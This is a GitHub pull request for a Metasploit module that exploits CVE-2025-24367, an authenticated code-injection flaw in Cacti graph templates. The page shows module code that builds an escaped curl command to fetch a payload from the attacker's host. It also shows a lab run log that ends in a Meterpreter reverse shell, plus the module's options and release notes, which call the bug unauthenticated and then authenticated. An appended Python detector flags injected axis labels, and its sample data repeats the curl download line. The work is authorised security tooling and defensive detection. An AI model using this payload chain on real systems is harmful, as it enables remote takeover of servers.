Cacti Graph Template Authenticated RCE [CVE-2025-24367] #20799
smcintyre-r7 merged 7 commits into rapid7:master from
Co-authored-by: Brendan <bwatters@rapid7.com>
execute_payload_command = "php\\x20#{on_disk_payload_name}"
end

upload_payload_command = "curl\\x20#{datastore['SRVHOST']}\\x3a#{datastore['SRVPORT']}/#{hosted_payload_name}\\x20-o\\x20#{on_disk_payload_name}"
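Review bot: no length guard is visible around the upload_payload_command assignment, even though the string is built directly from the user-controlled datastore['SRVHOST'] and datastore['SRVPORT'] values and the injected command is length-limited. Compute the resulting length where the command is assembled, fail the module with a clear message when it exceeds the cap instead of letting the exploit silently break, and record the cap in a comment next to the assignment so later changes to the command string do not reintroduce the problem.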
I think this is going to break when SSL is set to true because, due to known issues, that will cause the server to also be SSL. See #20740. I think what you'd want to do here is use #get_uri which will return the URL, accounting for SSL and whether or not SRVHOST is an IPv4 or IPv6 address by wrapping it as necessary. The catch is you'll need to escape the necessary characters yourself to place it here. I'd also suggest adding the flag to curl that ignores self-signed SSL certs.
Thanks for raising these issues, all good points. Currently the upload_payload_command length is 45 characters. The maximum payload size appears to be 47 characters, as a payload of 48 characters breaks the exploit. I'll add that as a comment here.
I only have room to add 2 additional characters to upload_payload_command with the SRVHOST and SRVPORT I have defined, which means SSL cannot be used, as adding -k https:// will exceed the limit. Also, using an IPv6 address would not be possible. I've added guards to ensure the limit is not exceeded by any of these factors in c45309e.
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
smcintyre-r7 left a comment:
Working with SSL now too.
msf exploit(multi/http/cacti_graph_template_rce) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf exploit(multi/http/cacti_graph_template_rce) >
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking Cacti version
[+] The web server is running Cacti version 1.2.28
[*] Attempting login with user `admin` and password `admin`
[+] Logged in
[+] The target is vulnerable.
[*] Using URL: http://192.168.159.128:808/s
[*] Payload execution command: php\x20i.php
[*] Template update response: HTTP 200
[*] Trigger template update response: HTTP 200
[*] 192.168.159.128 cacti_graph_template_rce - Request 'GET /s'
[*] 192.168.159.128 cacti_graph_template_rce - Sending payload ...
[+] PHP payload uploaded successfully to /cacti/s.php
[*] Template update response: HTTP 200
[*] Trigger template update response: HTTP 200
[*] Sending stage (41224 bytes) to 192.168.159.128
[+] Deleted s.php
[+] Deleted V.php
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.128:58896) at 2026-01-22 12:18:27 -0500
[*] Server stopped.
msf exploit(multi/http/cacti_graph_template_rce) > show options
Module options (exploit/multi/http/cacti_graph_template_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD admin yes Password to login with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5, socks5h,
http, sapni, socks4
RHOSTS 192.168.159.128 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit
.html
RPORT 8443 yes The target port (TCP)
SRVHOST 192.168.159.128 yes The local host or network interface to listen on. This must be an address on the local machine or
0.0.0.0 to listen on all addresses.
SRVPORT 808 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /cacti yes The base URI of Cacti
URIPATH no The URI to use for this exploit (default is random)
USERNAME admin yes User to login with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.159.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux
View the full module info with the info, or info -d command.
msf exploit(multi/http/cacti_graph_template_rce) >
Release Notes
This adds an exploit for CVE-2025-24367 which is an unauthenticated RCE in Cacti.
This module exploits an authenticated remote code execution vulnerability in Cacti versions prior to 1.2.29. Authenticated users can upload a graph template through the /graph_templates.php endpoint. The right_axis_label parameter is vulnerable to code injection, allowing attackers to execute arbitrary commands on the server. The payload is length limited; due to this constraint, the module starts an HTTP server and hosts the payload. The initial payload downloads the full payload using curl from the attacker's server and saves it to the web root of the Cacti server before executing it.
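As an added example, not code from the module or from this PR: a Python check for the two facts the description states, the affected version range (before 1.2.29) and the injection surface (right_axis_label), which a defender can run over template labels pulled from a Cacti database export or request log. The sample labels below are constructed, not taken from a real instance.

```python
import re

# Patterns that have no place in a graph axis label but do appear in the
# command-injection payloads discussed in this PR: backslash-hex escapes
# (the payload encodes space as \x20 and ':' as \x3a), shell separators,
# backticks and command substitution. A lone '&' is deliberately not
# flagged because labels such as "In & Out" are legitimate.
_HEX_ESCAPE = re.compile(r"\\x[0-9a-fA-F]{2}")
_SHELL_META = re.compile(r"[;|`<>]|\$\(|&&")

FIXED_VERSION = (1, 2, 29)


def parse_version(version: str) -> tuple:
    """Turn a Cacti version string such as '1.2.28' into a comparable tuple."""
    parts = tuple(int(p) for p in re.findall(r"\d+", version))
    if not parts:
        raise ValueError(f"unparseable Cacti version: {version!r}")
    return parts


def is_vulnerable_version(version: str) -> bool:
    """True when the reported Cacti version is before the fixed 1.2.29 release."""
    return parse_version(version) < FIXED_VERSION


def suspicious_axis_label(label: str) -> list:
    """Return the reasons a right_axis_label value looks like an injection attempt.

    An empty list means nothing suspicious was found.
    """
    reasons = []
    if _HEX_ESCAPE.search(label):
        reasons.append("backslash-hex escape")
    if _SHELL_META.search(label):
        reasons.append("shell metacharacter")
    return reasons


def scan_labels(labels: dict) -> dict:
    """Scan a mapping of template name -> right_axis_label, keeping only the hits."""
    findings = {}
    for name, label in labels.items():
        hits = suspicious_axis_label(label)
        if hits:
            findings[name] = hits
    return findings


# Constructed sample values (hypothetical template names and labels).
SAMPLE_LABELS = {
    "Requests per second": "req/s",
    "Interface traffic": "In & Out",
    "Injected download": "curl\\x20127.0.0.1\\x3a808/s\\x20-o\\x20s.php",
    "Backticks": "`id`",
}

if __name__ == "__main__":
    print("1.2.28 vulnerable:", is_vulnerable_version("1.2.28"))
    for name, hits in scan_labels(SAMPLE_LABELS).items():
        print(f"{name}: {', '.join(hits)}")
```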
Verification
use linux/http/cacti_graph_template_rce
set target <target>
run rhost=<target address> rport=<target port> lhost=<local address> username=<username> password=<password>
Testing
Linux target Cacti 1.2.28